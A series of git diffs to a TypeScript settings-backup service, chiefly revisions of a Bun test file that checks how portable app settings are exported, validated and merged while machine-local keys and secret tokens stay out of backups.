+    projectBackupPreferences(JSON.parse(preferencesFile.content.toString("utf-8")));
   }
   const mcpFile = files.find((file) => file.path === "mcp.jsonc");
   const parsedMcp = mcpFile
@@ -2546,7 +2544,6 @@ export async function planRestoreWrites(
       // that edit runs rather than as it was before the restore.
       const parsed: unknown = JSON.parse(file.content.toString("utf-8"));
       projectBackupPreferences(parsed);
-      readBackupSettings(parsed);
       backupPreferences = parsed;
       continue;
     }

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -133,7 +133,7 @@ describe("settingsProjection", () => {
 
     const merged = mergeBackupSettings(
       target,
-      readBackupSettings({ settings: projectBackupSettings({ projects: new Map() }) })!
+      readBackupSettings({ settings: projectBackupSettings({ projects: new Map() }) }).settings!
     );
 
     expect(merged.agentAiDefaults).toEqual({});
@@ -167,7 +167,7 @@ describe("settingsProjection", () => {
         taskSettings: { maxParallelAgentTasks: 2 },
         layoutPresets: { version: 2, slots: [] },
       },
-    })!;
+    }).settings!;
     const merged = mergeBackupSettings(current, sparse);
 
     expect(merged.agentAiDefaults).toEqual({ plan: { modelString: "anthropic:claude-plan" } });
@@ -196,7 +196,7 @@ describe("settingsProjection", () => {
   it("canonicalizes accepted values the way config.json persists them", () => {
     // A schema-valid document can still hold spellings the save path would rewrite; reading
     // them canonically is what makes the post-write comparison hold.
-    const settings = readBackupSettings({
+    const { settings } = readBackupSettings({
       settings: {
         defaultModel: " anthropic:claude-exec ",
         hiddenModels: ["openai:gpt-a", "openai:gpt-a", " "],
@@ -217,9 +217,10 @@ describe("settingsProjection", () => {
     });
   });
 
-  it("reads only the portable settings block and rejects a malformed one", () => {
-    expect(readBackupSettings({ appearance: { theme: "dark" } })).toBeUndefined();
-    expect(readBackupSettings(undefined)).toBeUndefined();
+  it("reads only the portable settings block", () => {
+    const none = { settings: undefined, unsupported: [] };
+    expect(readBackupSettings({ appearance: { theme: "dark" } })).toEqual(none);
+    expect(readBackupSettings(undefined)).toEqual(none);
 
     expect(
       readBackupSettings({
@@ -230,15 +231,35 @@ describe("settingsProjection", () => {
           unknownKey: true,
         },
       })
-    ).toEqual({ defaultModel: "anthropic:claude-plan" });
+    ).toEqual({ settings: { defaultModel: "anthropic:claude-plan" }, unsupported: [] });
+  });
 
-    // The error names the field so the Backup screen can say what is wrong with the document.
-    expect(() =>
-      readBackupSettings({ settings: { agentAiDefaults: { exec: { thinkingLevel: "bogus" } } } })
-    ).toThrow(/settings block \(agentAiDefaults\.exec\.thinkingLevel: /);
-    expect(() => readBackupSettings({ settings: { heartbeatDefaultIntervalMs: 1 } })).toThrow(
-      /heartbeatDefaultIntervalMs/
-    );
-    expect(() => readBackupSettings({ settings: null })).toThrow(/expected an object/);
+  it("keeps the local value for fields this build does not understand and names them", () => {
+    // A newer build's export (or a damaged document): the other fields still apply, and the
+    // restore reports the skipped ones instead of refusing the whole backup on a downgrade.
+    const read = readBackupSettings({
+      settings: {
+        agentAiDefaults: { exec: { thinkingLevel: "bogus" } },
+        heartbeatDefaultIntervalMs: 1,
+        defaultModel: "anthropic:claude-plan",
+      },
+    });
+    expect(read.unsupported).toEqual(["agentAiDefaults", "heartbeatDefaultIntervalMs"]);
+    expect(read.settings).toEqual({ defaultModel: "anthropic:claude-plan" });
+
+    const current: ProjectsConfig = {
+      projects: new Map(),
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local" } },
+      heartbeatDefaultIntervalMs: 900_000,
+    };
+    const merged = mergeBackupSettings(current, read.settings!);
+    expect(merged.agentAiDefaults).toEqual(current.agentAiDefaults);
+    expect(merged.heartbeatDefaultIntervalMs).toBe(900_000);
+    expect(merged.defaultModel).toBe("anthropic:claude-plan");
+
+    expect(readBackupSettings({ settings: null })).toEqual({
+      settings: undefined,
+      unsupported: ["settings (not an object)"],
+    });
   });
 });

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -3,6 +3,7 @@ import type { ProjectsConfig } from "@/common/types/project";
 import { DEFAULT_TASK_SETTINGS } from "@/common/types/tasks";
 import { DEFAULT_LAYOUT_PRESETS_CONFIG } from "@/common/types/uiLayouts";
 import { DEFAULT_GOAL_DEFAULTS } from "@/constants/goals";
+import { ADVISOR_DEFAULT_MAX_USES_PER_TURN } from "@/common/constants/advisor";
 import {
   mergeBackupSettings,
   projectBackupSettings,
@@ -19,7 +20,8 @@ const UNSET_EXPORT = {
   advisorModelString: null,
   advisorThinkingLevel: null,
   advisorReasoningMode: null,
-  advisorMaxUsesPerTurn: null,
+  // null would mean "unlimited" to the advisor, so the default cap stands in for unset.
+  advisorMaxUsesPerTurn: ADVISOR_DEFAULT_MAX_USES_PER_TURN,
   advisorMaxOutputTokens: null,
   taskSettings: DEFAULT_TASK_SETTINGS,
   heartbeatDefaultPrompt: null,
@@ -139,13 +141,31 @@ describe("settingsProjection", () => {
     expect(merged.agentAiDefaults).toEqual({});
     expect(merged.modelFallbacks).toBeUndefined();
     expect(merged.advisorModelString).toBeUndefined();
-    expect(merged.advisorMaxUsesPerTurn).toBeNull();
+    expect(merged.advisorMaxUsesPerTurn).toBe(ADVISOR_DEFAULT_MAX_USES_PER_TURN);
     expect(merged.chatTranscriptFullWidth).toBe(false);
     expect(merged.defaultRuntime).toBeUndefined();
     expect(merged.layoutPresets).toBeUndefined();
     expect(merged.apiServerPort).toBe(4321);
     // The round trip closes: the restored target exports what the source exported.
     expect(projectBackupSettings(merged)).toEqual(UNSET_EXPORT);
+  });
+
+  it("keeps the advisor's unlimited cap distinct from its default", () => {
+    // A source at the default cap must not restore as unlimited, and unlimited must survive.
+    const unlimited = projectBackupSettings({ projects: new Map(), advisorMaxUsesPerTurn: null });
+    expect(unlimited.advisorMaxUsesPerTurn).toBeNull();
+    const target: ProjectsConfig = { projects: new Map(), advisorMaxUsesPerTurn: null };
+    const fromDefault = readBackupSettings({
+      settings: projectBackupSettings({ projects: new Map() }),
+    }).settings!;
+    expect(mergeBackupSettings(target, fromDefault).advisorMaxUsesPerTurn).toBe(
+      ADVISOR_DEFAULT_MAX_USES_PER_TURN
+    );
+    const fromUnlimited = readBackupSettings({ settings: unlimited }).settings!;
+    expect(
+      mergeBackupSettings({ projects: new Map(), advisorMaxUsesPerTurn: 5 }, fromUnlimited)
+        .advisorMaxUsesPerTurn
+    ).toBeNull();
   });
 
   it("replaces the keys a sparse block carries and keeps the rest of the local config", () => {

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -273,9 +273,11 @@ describe("settingsProjection", () => {
       "layoutPresets",
     ]);
     expect(read.settings).toEqual({ defaultModel: "anthropic:claude-plan" });
-    expect(readBackupSettings({ settings: { layoutPresets: "garbage" } }).unsupported).toEqual([
-      "layoutPresets",
-    ]);
+    for (const layoutPresets of ["garbage", { version: 2, slots: "corrupt" }]) {
+      expect(readBackupSettings({ settings: { layoutPresets } }).unsupported).toEqual([
+        "layoutPresets",
+      ]);
+    }
 
     const current: ProjectsConfig = {
       projects: new Map(),

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -1,5 +1,6 @@
 import { describe, expect, it } from "bun:test";
 import type { ProjectsConfig } from "@/common/types/project";
+import { DEFAULT_TASK_SETTINGS } from "@/common/types/tasks";
 import { DEFAULT_LAYOUT_PRESETS_CONFIG } from "@/common/types/uiLayouts";
 import { DEFAULT_GOAL_DEFAULTS } from "@/constants/goals";
 import {
@@ -8,21 +9,18 @@ import {
   readBackupSettings,
 } from "./settingsProjection";
 
-const agentAiDefaults: ProjectsConfig["agentAiDefaults"] = {
-  exec: {
-    modelString: "anthropic:claude-exec",
-    thinkingLevel: "high",
-    subagent: { modelString: "openai:gpt-sub", thinkingLevel: "low" },
-  },
-  plan: { modelString: "openai:gpt-plan", reasoningMode: "pro", advisorEnabled: true },
-  review: { enabled: false },
-};
-
 describe("settingsProjection", () => {
   it("projects portable settings and leaves machine-local keys behind", () => {
-    const config: ProjectsConfig = {
-      projects: new Map([["/repo", { workspaces: [] }]]),
-      agentAiDefaults,
+    const portable = {
+      agentAiDefaults: {
+        exec: {
+          modelString: "anthropic:claude-exec",
+          thinkingLevel: "high",
+          subagent: { modelString: "openai:gpt-sub", thinkingLevel: "low" },
+        },
+        plan: { modelString: "openai:gpt-plan", reasoningMode: "pro", advisorEnabled: true },
+        review: { enabled: false },
+      },
       defaultModel: "anthropic:claude-exec",
       hiddenModels: ["openai:gpt-old"],
       minThinkingLevelByModel: { "openai:gpt-plan": "medium" },
@@ -50,6 +48,10 @@ describe("settingsProjection", () => {
       worktreeArchiveBehavior: "snapshot",
       runtimeEnablement: { docker: false },
       defaultRuntime: "worktree",
+    } satisfies Partial<ProjectsConfig>;
+    const config: ProjectsConfig = {
+      projects: new Map([["/repo", { workspaces: [] }]]),
+      ...portable,
       apiServerPort: 4321,
       apiServerBindHost: "0.0.0.0",
       terminalDefaultShell: "/bin/fish",
@@ -65,36 +67,7 @@ describe("settingsProjection", () => {
 
     const projected = projectBackupSettings(config);
 
-    expect(projected).toEqual({
-      agentAiDefaults,
-      defaultModel: "anthropic:claude-exec",
-      hiddenModels: ["openai:gpt-old"],
-      minThinkingLevelByModel: { "openai:gpt-plan": "medium" },
-      modelFallbacks: { "anthropic:claude-exec": { models: ["openai:gpt-plan"] } },
-      advisorModelString: "openai:gpt-advisor",
-      advisorThinkingLevel: "xhigh",
-      advisorReasoningMode: "pro",
-      advisorMaxUsesPerTurn: 3,
-      advisorMaxOutputTokens: null,
-      taskSettings: {
-        maxParallelAgentTasks: 4,
-        maxTaskNestingDepth: 2,
-        preserveSubagentsUntilArchive: true,
-      },
-      heartbeatDefaultPrompt: "Check in",
-      heartbeatDefaultIntervalMs: 15 * 60 * 1000,
-      goalDefaults: {
-        defaultBudgetCents: 500,
-        defaultTurnCap: 20,
-        alwaysRequireExplicitBudget: false,
-      },
-      chatTranscriptFullWidth: true,
-      llmDebugLogs: false,
-      coderWorkspaceArchiveBehavior: "delete",
-      worktreeArchiveBehavior: "snapshot",
-      runtimeEnablement: { docker: false },
-      defaultRuntime: "worktree",
-    });
+    expect(projected).toEqual(portable);
     expect(JSON.stringify(projected)).not.toContain("governor-secret");
     // A copy, not a view: editing the projection must not reach the live config.
     expect(projected.agentAiDefaults).not.toBe(config.agentAiDefaults);
@@ -135,8 +108,7 @@ describe("settingsProjection", () => {
     expect(merged.defaultModel).toBe("openai:gpt-local");
     expect(merged.apiServerPort).toBe(4321);
     expect(merged.terminalDefaultShell).toBe("/bin/fish");
-    expect(merged.taskSettings?.maxParallelAgentTasks).toBe(2);
-    expect(merged.taskSettings?.maxTaskNestingDepth).toBeGreaterThan(0);
+    expect(merged.taskSettings).toEqual({ ...DEFAULT_TASK_SETTINGS, maxParallelAgentTasks: 2 });
     expect(merged.layoutPresets).toEqual(DEFAULT_LAYOUT_PRESETS_CONFIG);
     expect(merged.migrations).toEqual({
       daybreakModelsHidden: true,

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -9,8 +9,31 @@ import {
   readBackupSettings,
 } from "./settingsProjection";
 
+/** What a config with none of the portable settings set exports: every key, spelled unset. */
+const UNSET_EXPORT = {
+  agentAiDefaults: {},
+  defaultModel: null,
+  hiddenModels: null,
+  minThinkingLevelByModel: null,
+  modelFallbacks: null,
+  advisorModelString: null,
+  advisorThinkingLevel: null,
+  advisorReasoningMode: null,
+  advisorMaxUsesPerTurn: null,
+  advisorMaxOutputTokens: null,
+  taskSettings: DEFAULT_TASK_SETTINGS,
+  heartbeatDefaultPrompt: null,
+  heartbeatDefaultIntervalMs: null,
+  goalDefaults: DEFAULT_GOAL_DEFAULTS,
+  chatTranscriptFullWidth: false,
+  llmDebugLogs: false,
+  runtimeEnablement: null,
+  defaultRuntime: null,
+  layoutPresets: null,
+};
+
 describe("settingsProjection", () => {
-  it("projects portable settings and leaves machine-local keys behind", () => {
+  it("projects every portable setting and leaves machine-local keys behind", () => {
     const portable = {
       agentAiDefaults: {
         exec: {
@@ -31,6 +54,7 @@ describe("settingsProjection", () => {
       advisorMaxUsesPerTurn: 3,
       advisorMaxOutputTokens: null,
       taskSettings: {
+        ...DEFAULT_TASK_SETTINGS,
         maxParallelAgentTasks: 4,
         maxTaskNestingDepth: 2,
         preserveSubagentsUntilArchive: true,
@@ -44,8 +68,6 @@ describe("settingsProjection", () => {
       },
       chatTranscriptFullWidth: true,
       llmDebugLogs: false,
-      coderWorkspaceArchiveBehavior: "delete",
-      worktreeArchiveBehavior: "snapshot",
       runtimeEnablement: { docker: false },
       defaultRuntime: "worktree",
     } satisfies Partial<ProjectsConfig>;
@@ -54,6 +76,8 @@ describe("settingsProjection", () => {
       ...portable,
       apiServerPort: 4321,
       apiServerBindHost: "0.0.0.0",
+      worktreeArchiveBehavior: "delete",
+      coderWorkspaceArchiveBehavior: "delete",
       terminalDefaultShell: "/bin/fish",
       updateChannel: "nightly",
       muxGovernorUrl: "https://governor.example.com",
@@ -67,25 +91,64 @@ describe("settingsProjection", () => {
 
     const projected = projectBackupSettings(config);
 
-    expect(projected).toEqual(portable);
+    expect(projected).toEqual({ ...portable, layoutPresets: null });
     expect(JSON.stringify(projected)).not.toContain("governor-secret");
     // A copy, not a view: editing the projection must not reach the live config.
     expect(projected.agentAiDefaults).not.toBe(config.agentAiDefaults);
   });
 
-  it("keeps an empty hidden list but drops empty agent defaults and layouts", () => {
-    const projected = projectBackupSettings({
-      projects: new Map(),
-      hiddenModels: [],
-      agentAiDefaults: {},
-      layoutPresets: DEFAULT_LAYOUT_PRESETS_CONFIG,
-      chatTranscriptFullWidth: false,
-    });
-    // goalDefaults always resolves to the effective value, as the config load does.
-    expect(projected).toEqual({ hiddenModels: [], goalDefaults: DEFAULT_GOAL_DEFAULTS });
+  it("exports resets as explicit unset values, the same for a fresh and a saved config", () => {
+    // A fresh install holds none of these keys; a loaded config holds their normalized forms.
+    // Both must export identically or the first push after a save would look like a change.
+    expect(projectBackupSettings({ projects: new Map() })).toEqual(UNSET_EXPORT);
+    expect(
+      projectBackupSettings({
+        projects: new Map(),
+        agentAiDefaults: {},
+        hiddenModels: undefined,
+        layoutPresets: DEFAULT_LAYOUT_PRESETS_CONFIG,
+        chatTranscriptFullWidth: undefined,
+        taskSettings: DEFAULT_TASK_SETTINGS,
+        goalDefaults: DEFAULT_GOAL_DEFAULTS,
+      })
+    ).toEqual(UNSET_EXPORT);
+    // An emptied hidden list is a choice, not an unset value.
+    expect(projectBackupSettings({ projects: new Map(), hiddenModels: [] }).hiddenModels).toEqual(
+      []
+    );
   });
 
-  it("replaces backed-up keys wholesale and keeps the rest of the local config", () => {
+  it("restoring a reset source clears the target's overrides", () => {
+    const target: ProjectsConfig = {
+      projects: new Map(),
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local" } },
+      modelFallbacks: { "openai:gpt-local": { models: ["anthropic:claude-exec"] } },
+      advisorModelString: "openai:gpt-advisor",
+      advisorMaxUsesPerTurn: 2,
+      chatTranscriptFullWidth: true,
+      defaultRuntime: "docker",
+      layoutPresets: { version: 2, slots: [{ slot: 1 }] },
+      apiServerPort: 4321,
+    };
+
+    const merged = mergeBackupSettings(
+      target,
+      readBackupSettings({ settings: projectBackupSettings({ projects: new Map() }) })!
+    );
+
+    expect(merged.agentAiDefaults).toEqual({});
+    expect(merged.modelFallbacks).toBeUndefined();
+    expect(merged.advisorModelString).toBeUndefined();
+    expect(merged.advisorMaxUsesPerTurn).toBeNull();
+    expect(merged.chatTranscriptFullWidth).toBe(false);
+    expect(merged.defaultRuntime).toBeUndefined();
+    expect(merged.layoutPresets).toBeUndefined();
+    expect(merged.apiServerPort).toBe(4321);
+    // The round trip closes: the restored target exports what the source exported.
+    expect(projectBackupSettings(merged)).toEqual(UNSET_EXPORT);
+  });
+
+  it("replaces the keys a sparse block carries and keeps the rest of the local config", () => {
     const current: ProjectsConfig = {
       projects: new Map(),
       agentAiDefaults: { exec: { modelString: "openai:gpt-local" }, review: { enabled: false } },
@@ -96,12 +159,16 @@ describe("settingsProjection", () => {
       migrations: { daybreakModelsHidden: true },
     };
 
-    const merged = mergeBackupSettings(current, {
-      agentAiDefaults: { plan: { modelString: "anthropic:claude-plan" } },
-      hiddenModels: [],
-      taskSettings: { maxParallelAgentTasks: 2 },
-      layoutPresets: { version: 2, slots: [] },
-    });
+    // A block an older build wrote, with only some of the keys.
+    const sparse = readBackupSettings({
+      settings: {
+        agentAiDefaults: { plan: { modelString: "anthropic:claude-plan" } },
+        hiddenModels: [],
+        taskSettings: { maxParallelAgentTasks: 2 },
+        layoutPresets: { version: 2, slots: [] },
+      },
+    })!;
+    const merged = mergeBackupSettings(current, sparse);
 
     expect(merged.agentAiDefaults).toEqual({ plan: { modelString: "anthropic:claude-plan" } });
     expect(merged.hiddenModels).toEqual([]);
@@ -109,7 +176,7 @@ describe("settingsProjection", () => {
     expect(merged.apiServerPort).toBe(4321);
     expect(merged.terminalDefaultShell).toBe("/bin/fish");
     expect(merged.taskSettings).toEqual({ ...DEFAULT_TASK_SETTINGS, maxParallelAgentTasks: 2 });
-    expect(merged.layoutPresets).toEqual(DEFAULT_LAYOUT_PRESETS_CONFIG);
+    expect(merged.layoutPresets).toBeUndefined();
     expect(merged.migrations).toEqual({
       daybreakModelsHidden: true,
       hiddenModelsInitialized: true,
@@ -120,9 +187,34 @@ describe("settingsProjection", () => {
   it("does not touch the hidden-model migration when the backup carries no list", () => {
     const merged = mergeBackupSettings(
       { projects: new Map(), migrations: { daybreakModelsHidden: true } },
-      { defaultModel: "anthropic:claude-plan" }
+      { defaultModel: "anthropic:claude-plan", hiddenModels: null }
     );
     expect(merged.migrations).toEqual({ daybreakModelsHidden: true });
+    expect(merged.hiddenModels).toBeUndefined();
+  });
+
+  it("canonicalizes accepted values the way config.json persists them", () => {
+    // A schema-valid document can still hold spellings the save path would rewrite; reading
+    // them canonically is what makes the post-write comparison hold.
+    const settings = readBackupSettings({
+      settings: {
+        defaultModel: " anthropic:claude-exec ",
+        hiddenModels: ["openai:gpt-a", "openai:gpt-a", " "],
+        modelFallbacks: {
+          "anthropic:claude-exec": { models: ["anthropic:claude-exec", "openai:gpt-plan"] },
+        },
+        heartbeatDefaultPrompt: "  Check in  ",
+        agentAiDefaults: { exec: { modelString: " openai:gpt-exec " } },
+      },
+    });
+
+    expect(settings).toMatchObject({
+      defaultModel: "anthropic:claude-exec",
+      hiddenModels: ["openai:gpt-a"],
+      modelFallbacks: { "anthropic:claude-exec": { models: ["openai:gpt-plan"] } },
+      heartbeatDefaultPrompt: "Check in",
+      agentAiDefaults: { exec: { modelString: "openai:gpt-exec" } },
+    });
   });
 
   it("reads only the portable settings block and rejects a malformed one", () => {
@@ -147,6 +239,6 @@ describe("settingsProjection", () => {
     expect(() => readBackupSettings({ settings: { heartbeatDefaultIntervalMs: 1 } })).toThrow(
       /heartbeatDefaultIntervalMs/
     );
-    expect(() => readBackupSettings({ settings: null })).toThrow();
+    expect(() => readBackupSettings({ settings: null })).toThrow(/expected an object/);
   });
 });

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -241,20 +241,32 @@ describe("settingsProjection", () => {
       settings: {
         agentAiDefaults: { exec: { thinkingLevel: "bogus" } },
         heartbeatDefaultIntervalMs: 1,
+        // The on-disk schema leaves this key unknown; a version this build cannot migrate would
+        // otherwise normalize to empty and delete the target's presets.
+        layoutPresets: { version: 3, slots: [{ slot: 1 }] },
         defaultModel: "anthropic:claude-plan",
       },
     });
-    expect(read.unsupported).toEqual(["agentAiDefaults", "heartbeatDefaultIntervalMs"]);
+    expect(read.unsupported).toEqual([
+      "agentAiDefaults",
+      "heartbeatDefaultIntervalMs",
+      "layoutPresets",
+    ]);
     expect(read.settings).toEqual({ defaultModel: "anthropic:claude-plan" });
+    expect(readBackupSettings({ settings: { layoutPresets: "garbage" } }).unsupported).toEqual([
+      "layoutPresets",
+    ]);
 
     const current: ProjectsConfig = {
       projects: new Map(),
       agentAiDefaults: { exec: { modelString: "openai:gpt-local" } },
       heartbeatDefaultIntervalMs: 900_000,
+      layoutPresets: { version: 2, slots: [{ slot: 1 }] },
     };
     const merged = mergeBackupSettings(current, read.settings!);
     expect(merged.agentAiDefaults).toEqual(current.agentAiDefaults);
     expect(merged.heartbeatDefaultIntervalMs).toBe(900_000);
+    expect(merged.layoutPresets).toEqual(current.layoutPresets);
     expect(merged.defaultModel).toBe("anthropic:claude-plan");
 
     expect(readBackupSettings({ settings: null })).toEqual({

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -140,10 +140,13 @@ describe("settingsProjection", () => {
       })
     ).toEqual({ defaultModel: "anthropic:claude-plan" });
 
+    // The error names the field so the Backup screen can say what is wrong with the document.
     expect(() =>
       readBackupSettings({ settings: { agentAiDefaults: { exec: { thinkingLevel: "bogus" } } } })
-    ).toThrow();
-    expect(() => readBackupSettings({ settings: { heartbeatDefaultIntervalMs: 1 } })).toThrow();
+    ).toThrow(/settings block \(agentAiDefaults\.exec\.thinkingLevel: /);
+    expect(() => readBackupSettings({ settings: { heartbeatDefaultIntervalMs: 1 } })).toThrow(
+      /heartbeatDefaultIntervalMs/
+    );
     expect(() => readBackupSettings({ settings: null })).toThrow();
   });
 });

--- a/src/node/services/backup/settingsProjection.test.ts
+++ b/src/node/services/backup/settingsProjection.test.ts
@@ -1,0 +1,177 @@
+import { describe, expect, it } from "bun:test";
+import type { ProjectsConfig } from "@/common/types/project";
+import { DEFAULT_LAYOUT_PRESETS_CONFIG } from "@/common/types/uiLayouts";
+import { DEFAULT_GOAL_DEFAULTS } from "@/constants/goals";
+import {
+  mergeBackupSettings,
+  projectBackupSettings,
+  readBackupSettings,
+} from "./settingsProjection";
+
+const agentAiDefaults: ProjectsConfig["agentAiDefaults"] = {
+  exec: {
+    modelString: "anthropic:claude-exec",
+    thinkingLevel: "high",
+    subagent: { modelString: "openai:gpt-sub", thinkingLevel: "low" },
+  },
+  plan: { modelString: "openai:gpt-plan", reasoningMode: "pro", advisorEnabled: true },
+  review: { enabled: false },
+};
+
+describe("settingsProjection", () => {
+  it("projects portable settings and leaves machine-local keys behind", () => {
+    const config: ProjectsConfig = {
+      projects: new Map([["/repo", { workspaces: [] }]]),
+      agentAiDefaults,
+      defaultModel: "anthropic:claude-exec",
+      hiddenModels: ["openai:gpt-old"],
+      minThinkingLevelByModel: { "openai:gpt-plan": "medium" },
+      modelFallbacks: { "anthropic:claude-exec": { models: ["openai:gpt-plan"] } },
+      advisorModelString: "openai:gpt-advisor",
+      advisorThinkingLevel: "xhigh",
+      advisorReasoningMode: "pro",
+      advisorMaxUsesPerTurn: 3,
+      advisorMaxOutputTokens: null,
+      taskSettings: {
+        maxParallelAgentTasks: 4,
+        maxTaskNestingDepth: 2,
+        preserveSubagentsUntilArchive: true,
+      },
+      heartbeatDefaultPrompt: "Check in",
+      heartbeatDefaultIntervalMs: 15 * 60 * 1000,
+      goalDefaults: {
+        defaultBudgetCents: 500,
+        defaultTurnCap: 20,
+        alwaysRequireExplicitBudget: false,
+      },
+      chatTranscriptFullWidth: true,
+      llmDebugLogs: false,
+      coderWorkspaceArchiveBehavior: "delete",
+      worktreeArchiveBehavior: "snapshot",
+      runtimeEnablement: { docker: false },
+      defaultRuntime: "worktree",
+      apiServerPort: 4321,
+      apiServerBindHost: "0.0.0.0",
+      terminalDefaultShell: "/bin/fish",
+      updateChannel: "nightly",
+      muxGovernorUrl: "https://governor.example.com",
+      muxGovernorToken: "governor-secret",
+      routePriority: ["anthropic"],
+      routeOverrides: { "anthropic:claude-exec": "direct" },
+      viewedSplashScreens: ["welcome"],
+      migrations: { hiddenModelsInitialized: true },
+      settingsBackup: { repoUrl: "https://example.com/backup.git", branch: "main", path: "xum" },
+    };
+
+    const projected = projectBackupSettings(config);
+
+    expect(projected).toEqual({
+      agentAiDefaults,
+      defaultModel: "anthropic:claude-exec",
+      hiddenModels: ["openai:gpt-old"],
+      minThinkingLevelByModel: { "openai:gpt-plan": "medium" },
+      modelFallbacks: { "anthropic:claude-exec": { models: ["openai:gpt-plan"] } },
+      advisorModelString: "openai:gpt-advisor",
+      advisorThinkingLevel: "xhigh",
+      advisorReasoningMode: "pro",
+      advisorMaxUsesPerTurn: 3,
+      advisorMaxOutputTokens: null,
+      taskSettings: {
+        maxParallelAgentTasks: 4,
+        maxTaskNestingDepth: 2,
+        preserveSubagentsUntilArchive: true,
+      },
+      heartbeatDefaultPrompt: "Check in",
+      heartbeatDefaultIntervalMs: 15 * 60 * 1000,
+      goalDefaults: {
+        defaultBudgetCents: 500,
+        defaultTurnCap: 20,
+        alwaysRequireExplicitBudget: false,
+      },
+      chatTranscriptFullWidth: true,
+      llmDebugLogs: false,
+      coderWorkspaceArchiveBehavior: "delete",
+      worktreeArchiveBehavior: "snapshot",
+      runtimeEnablement: { docker: false },
+      defaultRuntime: "worktree",
+    });
+    expect(JSON.stringify(projected)).not.toContain("governor-secret");
+    // A copy, not a view: editing the projection must not reach the live config.
+    expect(projected.agentAiDefaults).not.toBe(config.agentAiDefaults);
+  });
+
+  it("keeps an empty hidden list but drops empty agent defaults and layouts", () => {
+    const projected = projectBackupSettings({
+      projects: new Map(),
+      hiddenModels: [],
+      agentAiDefaults: {},
+      layoutPresets: DEFAULT_LAYOUT_PRESETS_CONFIG,
+      chatTranscriptFullWidth: false,
+    });
+    // goalDefaults always resolves to the effective value, as the config load does.
+    expect(projected).toEqual({ hiddenModels: [], goalDefaults: DEFAULT_GOAL_DEFAULTS });
+  });
+
+  it("replaces backed-up keys wholesale and keeps the rest of the local config", () => {
+    const current: ProjectsConfig = {
+      projects: new Map(),
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local" }, review: { enabled: false } },
+      defaultModel: "openai:gpt-local",
+      hiddenModels: ["openai:gpt-hidden-locally"],
+      apiServerPort: 4321,
+      terminalDefaultShell: "/bin/fish",
+      migrations: { daybreakModelsHidden: true },
+    };
+
+    const merged = mergeBackupSettings(current, {
+      agentAiDefaults: { plan: { modelString: "anthropic:claude-plan" } },
+      hiddenModels: [],
+      taskSettings: { maxParallelAgentTasks: 2 },
+      layoutPresets: { version: 2, slots: [] },
+    });
+
+    expect(merged.agentAiDefaults).toEqual({ plan: { modelString: "anthropic:claude-plan" } });
+    expect(merged.hiddenModels).toEqual([]);
+    expect(merged.defaultModel).toBe("openai:gpt-local");
+    expect(merged.apiServerPort).toBe(4321);
+    expect(merged.terminalDefaultShell).toBe("/bin/fish");
+    expect(merged.taskSettings?.maxParallelAgentTasks).toBe(2);
+    expect(merged.taskSettings?.maxTaskNestingDepth).toBeGreaterThan(0);
+    expect(merged.layoutPresets).toEqual(DEFAULT_LAYOUT_PRESETS_CONFIG);
+    expect(merged.migrations).toEqual({
+      daybreakModelsHidden: true,
+      hiddenModelsInitialized: true,
+    });
+    expect(current.agentAiDefaults?.exec).toBeDefined();
+  });
+
+  it("does not touch the hidden-model migration when the backup carries no list", () => {
+    const merged = mergeBackupSettings(
+      { projects: new Map(), migrations: { daybreakModelsHidden: true } },
+      { defaultModel: "anthropic:claude-plan" }
+    );
+    expect(merged.migrations).toEqual({ daybreakModelsHidden: true });
+  });
+
+  it("reads only the portable settings block and rejects a malformed one", () => {
+    expect(readBackupSettings({ appearance: { theme: "dark" } })).toBeUndefined();
+    expect(readBackupSettings(undefined)).toBeUndefined();
+
+    expect(
+      readBackupSettings({
+        settings: {
+          defaultModel: "anthropic:claude-plan",
+          apiServerPort: 4321,
+          muxGovernorToken: "smuggled",
+          unknownKey: true,
+        },
+      })
+    ).toEqual({ defaultModel: "anthropic:claude-plan" });
+
+    expect(() =>
+      readBackupSettings({ settings: { agentAiDefaults: { exec: { thinkingLevel: "bogus" } } } })
+    ).toThrow();
+    expect(() => readBackupSettings({ settings: { heartbeatDefaultIntervalMs: 1 } })).toThrow();
+    expect(() => readBackupSettings({ settings: null })).toThrow();
+  });
+});

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -1,10 +1,24 @@
-import { z } from "zod";
-import { AppConfigOnDiskSchema } from "@/common/config/schemas/appConfigOnDisk";
+import type { z } from "zod";
+import { AppConfigOnDiskSchema, GoalDefaultsSchema } from "@/common/config/schemas/appConfigOnDisk";
+import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
 import type { ProjectsConfig } from "@/common/types/project";
 import { normalizeTaskSettings } from "@/common/types/tasks";
+import { coerceOpenAIReasoningMode, coerceThinkingLevel } from "@/common/types/thinking";
 import { isLayoutPresetsConfigEmpty, normalizeLayoutPresetsConfig } from "@/common/types/uiLayouts";
 import { isPlainObject } from "@/common/utils/isPlainObject";
 import { normalizeGoalDefaults } from "@/constants/goals";
+import {
+  normalizeAiDefaultsModelStrings,
+  normalizeMinThinkingLevelByModel,
+  normalizeModelFallbacks,
+  normalizeOptionalModelString,
+  normalizeOptionalModelStringArray,
+  normalizeRuntimeEnablementId,
+  normalizeRuntimeEnablementOverrides,
+  parseOptionalHeartbeatIntervalMs,
+  parseOptionalNonEmptyString,
+  parseOptionalPositiveInteger,
+} from "@/node/config";
 
 /**
  * The top-level config.json settings a backup carries. Everything else stays local, so an
@@ -16,9 +30,13 @@ import { normalizeGoalDefaults } from "@/constants/goals";
  * - derived from providers.jsonc credentials, which are never exported (see
  *   providerService.syncGatewayLifecycleEffect): routePriority, routeOverrides, and the legacy
  *   muxGatewayEnabled and muxGatewayModels;
